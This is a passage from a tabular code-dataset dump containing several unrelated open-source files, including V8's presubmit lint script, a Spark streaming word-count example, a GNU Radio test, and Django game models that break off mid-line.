repo_name
stringlengths
6
100
path
stringlengths
4
294
copies
stringlengths
1
5
size
stringlengths
4
6
content
stringlengths
606
896k
license
stringclasses
15 values
greyhwndz/rethinkdb
external/v8_3.30.33.16/tools/presubmit.py
35
14090
#!/usr/bin/env python # # Copyright 2012 the V8 project authors. All rights reserved. # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. try: import hashlib md5er = hashlib.md5 except ImportError, e: import md5 md5er = md5.new import optparse import os from os.path import abspath, join, dirname, basename, exists import pickle import re import sys import subprocess import multiprocessing from subprocess import PIPE # Disabled LINT rules and reason. # build/include_what_you_use: Started giving false positives for variables # named "string" and "map" assuming that you needed to include STL headers. ENABLED_LINT_RULES = """ build/class build/deprecated build/endif_comment build/forward_decl build/include_alpha build/include_order build/printf_format build/storage_class legal/copyright readability/boost readability/braces readability/casting readability/constructors readability/fn_size readability/function readability/multiline_comment readability/multiline_string readability/streams readability/todo readability/utf8 runtime/arrays runtime/casting runtime/deprecated_fn runtime/explicit runtime/int runtime/memset runtime/mutex runtime/nonconf runtime/printf runtime/printf_format runtime/rtti runtime/sizeof runtime/string runtime/virtual runtime/vlog whitespace/blank_line whitespace/braces whitespace/comma whitespace/comments whitespace/ending_newline whitespace/indent whitespace/labels whitespace/line_length whitespace/newline whitespace/operators whitespace/parens whitespace/tab whitespace/todo """.split() # TODO(bmeurer): Fix and re-enable readability/check LINT_OUTPUT_PATTERN = re.compile(r'^.+[:(]\d+[:)]|^Done processing') def CppLintWorker(command): try: process = subprocess.Popen(command, stderr=subprocess.PIPE) process.wait() out_lines = "" error_count = -1 while True: out_line = process.stderr.readline() if out_line == '' and process.poll() != None: if error_count == -1: print "Failed to process %s" % command.pop() return 1 break m = LINT_OUTPUT_PATTERN.match(out_line) if m: out_lines += out_line error_count += 1 sys.stdout.write(out_lines) return error_count except KeyboardInterrupt: process.kill() except: print('Error running cpplint.py. Please make sure you have depot_tools' + ' in your $PATH. Lint check skipped.') process.kill() class FileContentsCache(object): def __init__(self, sums_file_name): self.sums = {} self.sums_file_name = sums_file_name def Load(self): try: sums_file = None try: sums_file = open(self.sums_file_name, 'r') self.sums = pickle.load(sums_file) except: # Cannot parse pickle for any reason. Not much we can do about it. pass finally: if sums_file: sums_file.close() def Save(self): try: sums_file = open(self.sums_file_name, 'w') pickle.dump(self.sums, sums_file) except: # Failed to write pickle. Try to clean-up behind us. if sums_file: sums_file.close() try: os.unlink(self.sums_file_name) except: pass finally: sums_file.close() def FilterUnchangedFiles(self, files): changed_or_new = [] for file in files: try: handle = open(file, "r") file_sum = md5er(handle.read()).digest() if not file in self.sums or self.sums[file] != file_sum: changed_or_new.append(file) self.sums[file] = file_sum finally: handle.close() return changed_or_new def RemoveFile(self, file): if file in self.sums: self.sums.pop(file) class SourceFileProcessor(object): """ Utility class that can run through a directory structure, find all relevant files and invoke a custom check on the files. """ def Run(self, path): all_files = [] for file in self.GetPathsToSearch(): all_files += self.FindFilesIn(join(path, file)) if not self.ProcessFiles(all_files, path): return False return True def IgnoreDir(self, name): return (name.startswith('.') or name in ('buildtools', 'data', 'gmock', 'gtest', 'kraken', 'octane', 'sunspider')) def IgnoreFile(self, name): return name.startswith('.') def FindFilesIn(self, path): result = [] for (root, dirs, files) in os.walk(path): for ignored in [x for x in dirs if self.IgnoreDir(x)]: dirs.remove(ignored) for file in files: if not self.IgnoreFile(file) and self.IsRelevant(file): result.append(join(root, file)) return result class CppLintProcessor(SourceFileProcessor): """ Lint files to check that they follow the google code style. """ def IsRelevant(self, name): return name.endswith('.cc') or name.endswith('.h') def IgnoreDir(self, name): return (super(CppLintProcessor, self).IgnoreDir(name) or (name == 'third_party')) IGNORE_LINT = ['flag-definitions.h'] def IgnoreFile(self, name): return (super(CppLintProcessor, self).IgnoreFile(name) or (name in CppLintProcessor.IGNORE_LINT)) def GetPathsToSearch(self): return ['src', 'include', 'samples', join('test', 'cctest'), join('test', 'unittests')] def GetCpplintScript(self, prio_path): for path in [prio_path] + os.environ["PATH"].split(os.pathsep): path = path.strip('"') cpplint = os.path.join(path, "cpplint.py") if os.path.isfile(cpplint): return cpplint return None def ProcessFiles(self, files, path): good_files_cache = FileContentsCache('.cpplint-cache') good_files_cache.Load() files = good_files_cache.FilterUnchangedFiles(files) if len(files) == 0: print 'No changes in files detected. Skipping cpplint check.' return True filt = '-,' + ",".join(['+' + n for n in ENABLED_LINT_RULES]) command = [sys.executable, 'cpplint.py', '--filter', filt] cpplint = self.GetCpplintScript(join(path, "tools")) if cpplint is None: print('Could not find cpplint.py. Make sure ' 'depot_tools is installed and in the path.') sys.exit(1) command = [sys.executable, cpplint, '--filter', filt] commands = join([command + [file] for file in files]) count = multiprocessing.cpu_count() pool = multiprocessing.Pool(count) try: results = pool.map_async(CppLintWorker, commands).get(999999) except KeyboardInterrupt: print "\nCaught KeyboardInterrupt, terminating workers." sys.exit(1) for i in range(len(files)): if results[i] > 0: good_files_cache.RemoveFile(files[i]) total_errors = sum(results) print "Total errors found: %d" % total_errors good_files_cache.Save() return total_errors == 0 COPYRIGHT_HEADER_PATTERN = re.compile( r'Copyright [\d-]*20[0-1][0-9] the V8 project authors. All rights reserved.') class SourceProcessor(SourceFileProcessor): """ Check that all files include a copyright notice and no trailing whitespaces. """ RELEVANT_EXTENSIONS = ['.js', '.cc', '.h', '.py', '.c', '.status', '.gyp', '.gypi'] # Overwriting the one in the parent class. def FindFilesIn(self, path): if os.path.exists(path+'/.git'): output = subprocess.Popen('git ls-files --full-name', stdout=PIPE, cwd=path, shell=True) result = [] for file in output.stdout.read().split(): for dir_part in os.path.dirname(file).replace(os.sep, '/').split('/'): if self.IgnoreDir(dir_part): break else: if (self.IsRelevant(file) and os.path.exists(file) and not self.IgnoreFile(file)): result.append(join(path, file)) if output.wait() == 0: return result return super(SourceProcessor, self).FindFilesIn(path) def IsRelevant(self, name): for ext in SourceProcessor.RELEVANT_EXTENSIONS: if name.endswith(ext): return True return False def GetPathsToSearch(self): return ['.'] def IgnoreDir(self, name): return (super(SourceProcessor, self).IgnoreDir(name) or name in ('third_party', 'gyp', 'out', 'obj', 'DerivedSources')) IGNORE_COPYRIGHTS = ['cpplint.py', 'daemon.py', 'earley-boyer.js', 'raytrace.js', 'crypto.js', 'libraries.cc', 'libraries-empty.cc', 'jsmin.py', 'regexp-pcre.js', 'gnuplot-4.6.3-emscripten.js'] IGNORE_TABS = IGNORE_COPYRIGHTS + ['unicode-test.js', 'html-comments.js'] def EndOfDeclaration(self, line): return line == "}" or line == "};" def StartOfDeclaration(self, line): return line.find("//") == 0 or \ line.find("/*") == 0 or \ line.find(") {") != -1 def ProcessContents(self, name, contents): result = True base = basename(name) if not base in SourceProcessor.IGNORE_TABS: if '\t' in contents: print "%s contains tabs" % name result = False if not base in SourceProcessor.IGNORE_COPYRIGHTS: if not COPYRIGHT_HEADER_PATTERN.search(contents): print "%s is missing a correct copyright header." % name result = False if ' \n' in contents or contents.endswith(' '): line = 0 lines = [] parts = contents.split(' \n') if not contents.endswith(' '): parts.pop() for part in parts: line += part.count('\n') + 1 lines.append(str(line)) linenumbers = ', '.join(lines) if len(lines) > 1: print "%s has trailing whitespaces in lines %s." % (name, linenumbers) else: print "%s has trailing whitespaces in line %s." % (name, linenumbers) result = False if not contents.endswith('\n') or contents.endswith('\n\n'): print "%s does not end with a single new line." % name result = False # Check two empty lines between declarations. if name.endswith(".cc"): line = 0 lines = [] parts = contents.split('\n') while line < len(parts) - 2: if self.EndOfDeclaration(parts[line]): if self.StartOfDeclaration(parts[line + 1]): lines.append(str(line + 1)) line += 1 elif parts[line + 1] == "" and \ self.StartOfDeclaration(parts[line + 2]): lines.append(str(line + 1)) line += 2 line += 1 if len(lines) >= 1: linenumbers = ', '.join(lines) if len(lines) > 1: print "%s does not have two empty lines between declarations " \ "in lines %s." % (name, linenumbers) else: print "%s does not have two empty lines between declarations " \ "in line %s." % (name, linenumbers) result = False return result def ProcessFiles(self, files, path): success = True violations = 0 for file in files: try: handle = open(file) contents = handle.read() if not self.ProcessContents(file, contents): success = False violations += 1 finally: handle.close() print "Total violating files: %s" % violations return success def CheckRuntimeVsNativesNameClashes(workspace): code = subprocess.call( [sys.executable, join(workspace, "tools", "check-name-clashes.py")]) return code == 0 def CheckExternalReferenceRegistration(workspace): code = subprocess.call( [sys.executable, join(workspace, "tools", "external-reference-check.py")]) return code == 0 def GetOptions(): result = optparse.OptionParser() result.add_option('--no-lint', help="Do not run cpplint", default=False, action="store_true") return result def Main(): workspace = abspath(join(dirname(sys.argv[0]), '..')) parser = GetOptions() (options, args) = parser.parse_args() success = True print "Running C++ lint check..." if not options.no_lint: success = CppLintProcessor().Run(workspace) and success print "Running copyright header, trailing whitespaces and " \ "two empty lines between declarations check..." success = SourceProcessor().Run(workspace) and success success = CheckRuntimeVsNativesNameClashes(workspace) and success success = CheckExternalReferenceRegistration(workspace) and success if success: return 0 else: return 1 if __name__ == '__main__': sys.exit(Main())
agpl-3.0
ribeiro-ucl/viewflow
tests/unit/tests/test_db_fields.py
2
2790
from django.test import TestCase from viewflow.token import Token from viewflow.fields import ClassValueWrapper from ..models import FlowReferencedModel, TokenModel from ..flows import SingleTaskFlow, AllTaskFlow class TestReferenceFields(TestCase): """ Custom db field for store referencies to class """ def test_flowmodel_default_crud_succeed(self): instance = FlowReferencedModel() instance.flow_cls = SingleTaskFlow instance.save() instance = FlowReferencedModel.objects.get(pk=instance.pk) self.assertEqual(instance.flow_cls, SingleTaskFlow) self.assertEqual(instance.task, SingleTaskFlow.start) def test_flow_cls_crud_succeed(self): instance = FlowReferencedModel.objects.create( flow_cls=SingleTaskFlow, task=SingleTaskFlow.end) instance = FlowReferencedModel.objects.get(pk=instance.pk) self.assertEqual(instance.flow_cls, SingleTaskFlow) self.assertEqual(instance.task, SingleTaskFlow.end) def test_get_by_cls_succeed(self): first = FlowReferencedModel.objects.create( flow_cls=SingleTaskFlow, task=SingleTaskFlow.end) second = FlowReferencedModel.objects.get(flow_cls=ClassValueWrapper(SingleTaskFlow)) self.assertEqual(first.pk, second.pk) def test_get_by_flow_task_succeed(self): FlowReferencedModel.objects.create( flow_cls=SingleTaskFlow, task=SingleTaskFlow.start) FlowReferencedModel.objects.create( flow_cls=AllTaskFlow, task=AllTaskFlow.start) instance = FlowReferencedModel.objects.get(task=SingleTaskFlow.start) self.assertEqual(instance.flow_cls, SingleTaskFlow) self.assertEqual(instance.task, SingleTaskFlow.start) def test_get_by_flow_task_ref_succeed(self): FlowReferencedModel.objects.create( flow_cls=SingleTaskFlow, task=SingleTaskFlow.start) FlowReferencedModel.objects.create( flow_cls=AllTaskFlow, task=AllTaskFlow.start) instance = FlowReferencedModel.objects.get(task='unit/flows.SingleTaskFlow.start') self.assertEqual(instance.flow_cls, SingleTaskFlow) self.assertEqual(instance.task, SingleTaskFlow.start) class TestTokenField(TestCase): def test_crud_succeed(self): instance = TokenModel() instance.token = Token('start/1_2') instance.save() def test_default_succeed(self): instance = TokenModel() self.assertTrue(isinstance(instance.token, Token)) instance.save() def test_startswith_lookup_succeed(self): TokenModel.objects.create(token='start/1_2') instance = TokenModel.objects.get(token__startswith='start/1_') self.assertEqual('start/1_2', instance.token)
agpl-3.0
yanheven/cinder
cinder/api/views/backups.py
8
3833
# Copyright (C) 2012 Hewlett-Packard Development Company, L.P. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_log import log as logging from cinder.api import common LOG = logging.getLogger(__name__) class ViewBuilder(common.ViewBuilder): """Model backup API responses as a python dictionary.""" _collection_name = "backups" def __init__(self): """Initialize view builder.""" super(ViewBuilder, self).__init__() def summary_list(self, request, backups, origin_backup_count): """Show a list of backups without many details.""" return self._list_view(self.summary, request, backups, origin_backup_count) def detail_list(self, request, backups, origin_backup_count): """Detailed view of a list of backups .""" return self._list_view(self.detail, request, backups, origin_backup_count) def summary(self, request, backup): """Generic, non-detailed view of a backup.""" return { 'backup': { 'id': backup['id'], 'name': backup['display_name'], 'links': self._get_links(request, backup['id']), }, } def restore_summary(self, request, restore): """Generic, non-detailed view of a restore.""" return { 'restore': { 'backup_id': restore['backup_id'], 'volume_id': restore['volume_id'], }, } def detail(self, request, backup): """Detailed view of a single backup.""" return { 'backup': { 'id': backup.get('id'), 'status': backup.get('status'), 'size': backup.get('size'), 'object_count': backup.get('object_count'), 'availability_zone': backup.get('availability_zone'), 'container': backup.get('container'), 'created_at': backup.get('created_at'), 'name': backup.get('display_name'), 'description': backup.get('display_description'), 'fail_reason': backup.get('fail_reason'), 'volume_id': backup.get('volume_id'), 'links': self._get_links(request, backup['id']) } } def _list_view(self, func, request, backups, origin_backup_count): """Provide a view for a list of backups.""" backups_list = [func(request, backup)['backup'] for backup in backups] backups_links = self._get_collection_links(request, backups, self._collection_name, origin_backup_count) backups_dict = dict(backups=backups_list) if backups_links: backups_dict['backups_links'] = backups_links return backups_dict def export_summary(self, request, export): """Generic view of an export.""" return { 'backup-record': { 'backup_service': export['backup_service'], 'backup_url': export['backup_url'], }, }
apache-2.0
ffu/DSA-3.2.2
gnuradio-core/src/python/gnuradio/gr/qa_interleave.py
6
2818
#!/usr/bin/env python # # Copyright 2004,2007 Free Software Foundation, Inc. # # This file is part of GNU Radio # # GNU Radio is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3, or (at your option) # any later version. # # GNU Radio is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GNU Radio; see the file COPYING. If not, write to # the Free Software Foundation, Inc., 51 Franklin Street, # Boston, MA 02110-1301, USA. # from gnuradio import gr, gr_unittest import math class test_interleave (gr_unittest.TestCase): def setUp (self): self.tb = gr.top_block () def tearDown (self): self.tb = None def test_int_001 (self): lenx = 64 src0 = gr.vector_source_f (range (0, lenx, 4)) src1 = gr.vector_source_f (range (1, lenx, 4)) src2 = gr.vector_source_f (range (2, lenx, 4)) src3 = gr.vector_source_f (range (3, lenx, 4)) op = gr.interleave (gr.sizeof_float) dst = gr.vector_sink_f () self.tb.connect (src0, (op, 0)) self.tb.connect (src1, (op, 1)) self.tb.connect (src2, (op, 2)) self.tb.connect (src3, (op, 3)) self.tb.connect (op, dst) self.tb.run () expected_result = tuple (range (lenx)) result_data = dst.data () self.assertFloatTuplesAlmostEqual (expected_result, result_data) def test_deint_001 (self): lenx = 64 src = gr.vector_source_f (range (lenx)) op = gr.deinterleave (gr.sizeof_float) dst0 = gr.vector_sink_f () dst1 = gr.vector_sink_f () dst2 = gr.vector_sink_f () dst3 = gr.vector_sink_f () self.tb.connect (src, op) self.tb.connect ((op, 0), dst0) self.tb.connect ((op, 1), dst1) self.tb.connect ((op, 2), dst2) self.tb.connect ((op, 3), dst3) self.tb.run () expected_result0 = tuple (range (0, lenx, 4)) expected_result1 = tuple (range (1, lenx, 4)) expected_result2 = tuple (range (2, lenx, 4)) expected_result3 = tuple (range (3, lenx, 4)) self.assertFloatTuplesAlmostEqual (expected_result0, dst0.data ()) self.assertFloatTuplesAlmostEqual (expected_result1, dst1.data ()) self.assertFloatTuplesAlmostEqual (expected_result2, dst2.data ()) self.assertFloatTuplesAlmostEqual (expected_result3, dst3.data ()) if __name__ == '__main__': gr_unittest.main ()
gpl-3.0
perlygatekeeper/glowing-robot
google_test/free_the_bunny_prisoners/solution_5_fails.py
1
1090
import itertools def solution(bunnies,keys_required): answer = [] for i in range(bunnies): answer.append([]) # if keys_required > bunnies: # return None if keys_required == 0: return [[0]] elif keys_required == 1: key = 0 for group in range(bunnies): answer[group].append(key) elif bunnies == keys_required: key = 0 for group in range(bunnies): answer[group].append(key) key += 1 else: key = 0 for item in itertools.combinations(range(bunnies), keys_required): for group in item: answer[group].append(key) key += 1 return answer for num_buns in range(1,10): for num_required in range(10): key_dist = solution(num_buns,num_required) print("-" * 60) print("Answer for {0:d} bunnies, requiring {1:d}".format(num_buns,num_required)) if ( len(key_dist[0]) * len(key_dist) ) < 25: print(key_dist) else: for bun in key_dist: print(bun)
artistic-2.0
techdragon/nikola
nikola/plugins/compile/pandoc.py
9
2903
# -*- coding: utf-8 -*- # Copyright © 2012-2015 Roberto Alsina and others. # Permission is hereby granted, free of charge, to any # person obtaining a copy of this software and associated # documentation files (the "Software"), to deal in the # Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the # Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice # shall be included in all copies or substantial portions of # the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY # KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR # PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS # OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR # OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE # SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """Implementation of compile_html based on pandoc. You will need, of course, to install pandoc """ from __future__ import unicode_literals import io import os import subprocess from nikola.plugin_categories import PageCompiler from nikola.utils import req_missing, makedirs, write_metadata class CompilePandoc(PageCompiler): """Compile markups into HTML using pandoc.""" name = "pandoc" friendly_name = "pandoc" def set_site(self, site): """Set Nikola site.""" self.config_dependencies = [str(site.config['PANDOC_OPTIONS'])] super(CompilePandoc, self).set_site(site) def compile_html(self, source, dest, is_two_file=True): """Compile source file into HTML and save as dest.""" makedirs(os.path.dirname(dest)) try: subprocess.check_call(['pandoc', '-o', dest, source] + self.site.config['PANDOC_OPTIONS']) except OSError as e: if e.strreror == 'No such file or directory': req_missing(['pandoc'], 'build this site (compile with pandoc)', python=False) def create_post(self, path, **kw): """Create a new post.""" content = kw.pop('content', None) onefile = kw.pop('onefile', False) # is_page is not used by create_post as of now. kw.pop('is_page', False) metadata = {} metadata.update(self.default_metadata) metadata.update(kw) makedirs(os.path.dirname(path)) if not content.endswith('\n'): content += '\n' with io.open(path, "w+", encoding="utf8") as fd: if onefile: fd.write('<!--\n') fd.write(write_metadata(metadata)) fd.write('-->\n\n') fd.write(content)
mit
mdespriee/spark
examples/src/main/python/sql/streaming/structured_network_wordcount_windowed.py
51
4086
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # r""" Counts words in UTF8 encoded, '\n' delimited text received from the network over a sliding window of configurable duration. Each line from the network is tagged with a timestamp that is used to determine the windows into which it falls. Usage: structured_network_wordcount_windowed.py <hostname> <port> <window duration> [<slide duration>] <hostname> and <port> describe the TCP server that Structured Streaming would connect to receive data. <window duration> gives the size of window, specified as integer number of seconds <slide duration> gives the amount of time successive windows are offset from one another, given in the same units as above. <slide duration> should be less than or equal to <window duration>. If the two are equal, successive windows have no overlap. If <slide duration> is not provided, it defaults to <window duration>. To run this on your local machine, you need to first run a Netcat server `$ nc -lk 9999` and then run the example `$ bin/spark-submit examples/src/main/python/sql/streaming/structured_network_wordcount_windowed.py localhost 9999 <window duration> [<slide duration>]` One recommended <window duration>, <slide duration> pair is 10, 5 """ from __future__ import print_function import sys from pyspark.sql import SparkSession from pyspark.sql.functions import explode from pyspark.sql.functions import split from pyspark.sql.functions import window if __name__ == "__main__": if len(sys.argv) != 5 and len(sys.argv) != 4: msg = ("Usage: structured_network_wordcount_windowed.py <hostname> <port> " "<window duration in seconds> [<slide duration in seconds>]") print(msg, file=sys.stderr) sys.exit(-1) host = sys.argv[1] port = int(sys.argv[2]) windowSize = int(sys.argv[3]) slideSize = int(sys.argv[4]) if (len(sys.argv) == 5) else windowSize if slideSize > windowSize: print("<slide duration> must be less than or equal to <window duration>", file=sys.stderr) windowDuration = '{} seconds'.format(windowSize) slideDuration = '{} seconds'.format(slideSize) spark = SparkSession\ .builder\ .appName("StructuredNetworkWordCountWindowed")\ .getOrCreate() # Create DataFrame representing the stream of input lines from connection to host:port lines = spark\ .readStream\ .format('socket')\ .option('host', host)\ .option('port', port)\ .option('includeTimestamp', 'true')\ .load() # Split the lines into words, retaining timestamps # split() splits each line into an array, and explode() turns the array into multiple rows words = lines.select( explode(split(lines.value, ' ')).alias('word'), lines.timestamp ) # Group the data by window and word and compute the count of each group windowedCounts = words.groupBy( window(words.timestamp, windowDuration, slideDuration), words.word ).count().orderBy('window') # Start running the query that prints the windowed word counts to the console query = windowedCounts\ .writeStream\ .outputMode('complete')\ .format('console')\ .option('truncate', 'false')\ .start() query.awaitTermination()
apache-2.0
adamncasey/servo
tests/wpt/web-platform-tests/css/tools/w3ctestlib/Suite.py
80
4441
#!/usr/bin/python # CSS Test Suite Manipulation Library # Initial code by fantasai, joint copyright 2010 W3C and Microsoft # Licensed under BSD 3-Clause: <http://www.w3.org/Consortium/Legal/2008/03-bsd-license> import OutputFormats import Utils from Groups import TestGroup, excludeDirs from Sources import SourceTree, SourceCache from shutil import copytree, rmtree from os.path import join import os from mercurial import ui as UserInterface, hg class TestSuite: """Representation of a standard CSS test suite.""" def __init__(self, name, title, specUri, draftUri, sourceCache = None, ui = None): self.name = name self.title = title self.specroot = specUri self.draftroot = draftUri self.ui = ui if ui else UserInterface.ui() self.defaultReftestRelpath='reftest.list' self.groups = {} self.sourcecache = sourceCache if sourceCache else SourceCache(SourceTree(hg.repository(self.ui, '.'))) self.formats = ('html4', 'xhtml1', 'xhtml1print') # XXX FIXME, hardcoded list is lame self.rawgroups = {} def addTestsByExt(self, dir, ext, groupName='', groupTitle=''): """Add tests from directory `dir` by file extension (via `ext`, e.g. ext='.xht'). """ group = TestGroup(self.sourcecache, dir, selfTestExt=ext, name=groupName, title=groupTitle, ui = self.ui) self.addGroup(group) def addTestsByList(self, dir, filenames, groupName='', groupTitle=''): """Add tests from directory `dir`, via file name list `filenames`. """ group = TestGroup(self.sourcecache, dir, selfTestList=filenames, name=groupName, title=groupTitle, ui = self.ui) self.addGroup(group) def addReftests(self, dir, manifestPath, groupName='', groupTitle=''): """Add tests by importing context of directory `dir` and importing all tests listed in the `reftestManifestName` manifest inside `dir`. """ group = TestGroup(self.sourcecache, dir, manifestPath=manifestPath, manifestDest=self.defaultReftestRelpath, name=groupName, title=groupTitle, ui = self.ui) self.addGroup(group) def addGroup(self, group): """ Add CSSTestGroup `group` to store. """ master = self.groups.get(group.name) if master: master.merge(group) else: self.groups[group.name] = group def addRaw(self, dir, relpath): """Add the contents of directory `dir` to the test suite by copying (not processing). Note this means such tests will not be indexed. `relpath` gives the directory's path within the build destination. """ self.rawgroups[dir] = relpath def setFormats(self, formats): self.formats = formats def buildInto(self, dest, indexer): """Builds test suite through all OutputFormats into directory at path `dest` or through OutputFormat destination `dest`, using Indexer `indexer`. """ if isinstance(dest, OutputFormats.BasicFormat): formats = (dest,) dest = dest.root else: formats = [] for format in self.formats: if (format == 'html4'): formats.append(OutputFormats.HTMLFormat(dest, self.sourcecache.sourceTree)) elif (format == 'html5'): formats.append(OutputFormats.HTML5Format(dest, self.sourcecache.sourceTree)) elif (format == 'xhtml1'): formats.append(OutputFormats.XHTMLFormat(dest, self.sourcecache.sourceTree)) elif (format == 'xhtml1print'): formats.append(OutputFormats.XHTMLPrintFormat(dest, self.sourcecache.sourceTree, self.title)) elif (format == 'svg'): formats.append(OutputFormats.SVGFormat(dest, self.sourcecache.sourceTree)) for format in formats: for group in self.groups.itervalues(): group.build(format) for group in self.groups.itervalues(): indexer.indexGroup(group) for format in formats: indexer.writeIndex(format) rawtests = [] for src, relpath in self.rawgroups.items(): copytree(src, join(dest,relpath)) for (root, dirs, files) in os.walk(join(dest,relpath)): for xdir in excludeDirs: if xdir in dirs: dirs.remove(xdir) rmtree(join(root,xdir)) rawtests.extend( [join(Utils.relpath(root,dest),file) for file in files] ) rawtests.sort() indexer.writeOverview(dest, addTests=rawtests)
mpl-2.0
mrjmad/nagademon_2014
nagademon2014/maingame/models/history_elements.py
1
6460
# -*- coding: utf-8 -*- from __future__ import (print_function, division, absolute_import, unicode_literals) from django.utils.encoding import python_2_unicode_compatible from django.utils.translation import ugettext_lazy as _ from django.conf import settings from django.db import models USER_MODEL = settings.AUTH_USER_MODEL @python_2_unicode_compatible class Character(models.Model): short_name = models.CharField(_("NPC's short Name"), max_length=20, unique=True) first_name = models.CharField("Firstname of Character", max_length=50) last_name = models.CharField("Lastname of Character", max_length=50) gender = models.PositiveSmallIntegerField(u"Gender of Character") description = models.TextField("Description") def __str__(self): return u"%s %s" % (self.first_name, self.last_name) class Meta: abstract = True @python_2_unicode_compatible class PlayerCharacter(Character): def __str__(self): return u"PC : %s %s" % (self.first_name, self.last_name) @python_2_unicode_compatible class NPCharacter(Character): def __str__(self): return u"NPC : %s %s" % (self.first_name, self.last_name) class PlaceManager(models.Manager): def get_by_natural_key(self, short_name): return self.get(short_name=short_name) @python_2_unicode_compatible class Place(models.Model): objects = PlaceManager() begin_sound = models.CharField(_("Begin's Sound"), max_length=200, blank=True, null=True) ambiance_sound = models.CharField(_("Ambiance's Sound"), max_length=200, blank=True, null=True) short_name = models.CharField(_("Place's short Name"), max_length=20, unique=True) name = models.CharField("Scene's Name", max_length=200) filename = models.CharField("Scene's Filename", max_length=80) text = models.TextField("Scene's Text") def __str__(self): return self.name def natural_key(self): return self.short_name, @python_2_unicode_compatible class Scene(models.Model): short_name = models.CharField(_("Scene's short Name"), max_length=20, unique=True) name = models.CharField("Scene's Name", max_length=200) filename = models.CharField("Scene's Filename", max_length=80) begin_sound = models.CharField(_("Begin's Sound"), max_length=200, blank=True, null=True) ambiance_sound = models.CharField(_("Ambiance's Sound"), max_length=200, blank=True, null=True) synopsis = models.TextField("Scene's synopsis, only for authors") final = models.BooleanField("Final Round ?", default=False) place = models.ForeignKey(Place, verbose_name="Scene's Place", blank=True, null=True) is_active = models.BooleanField(_("Is active ?"), default=True) order = models.PositiveIntegerField(_("Scene's Order"), default=0) need_a_trigger = models.BooleanField(_("Activable only by a trigger"), default=False) def __str__(self): return self.name @python_2_unicode_compatible class PartScene(models.Model): text = models.CharField("Scene's Text", max_length=400) for_scene = models.ForeignKey(Scene, verbose_name="Scene") limited_to_player = models.ForeignKey(PlayerCharacter, blank=True, null=True) parent = models.ForeignKey('self', blank=True, null=True) active = models.BooleanField(default=True) def __str__(self): return "Text %s |for scene :%s" % (self.text, self.for_scene) @python_2_unicode_compatible class Choice1PartSceneto1Scene(models.Model): text = models.CharField("Choice's Text", max_length=400) for_part_scene = models.ForeignKey(PartScene, verbose_name="Current Part Scene", related_name="current_choices_set") next_scene = models.ForeignKey(Scene, verbose_name="Next Scene", related_name="leading_choices_set", null=True, blank=True) next_part_scene = models.ForeignKey(PartScene, verbose_name="Next Part Scene", related_name="leading_choices_set", null=True, blank=True) def __str__(self): return "%s |for scene %s , part scene id :%s" % (self.text, self.for_part_scene.for_scene, self.for_part_scene.id) @python_2_unicode_compatible class Quest(models.Model): short_name = models.CharField(_("Quest's short Name"), max_length=20, unique=True) title = models.CharField("Quest's Title", max_length=140) text = models.TextField("Quest's Text") time_frame = models.PositiveIntegerField(_("Maximum Time (in minutes) for validate the Quest"), default=0) given_by = models.ForeignKey(NPCharacter, verbose_name=_('Given by')) scene = models.ForeignKey(Scene, verbose_name=_("Scene who Quest is activable"), related_name=_("quests_for_scene")) scene_after = models.ForeignKey(Scene, verbose_name=_("Scene after the End's Quest"), 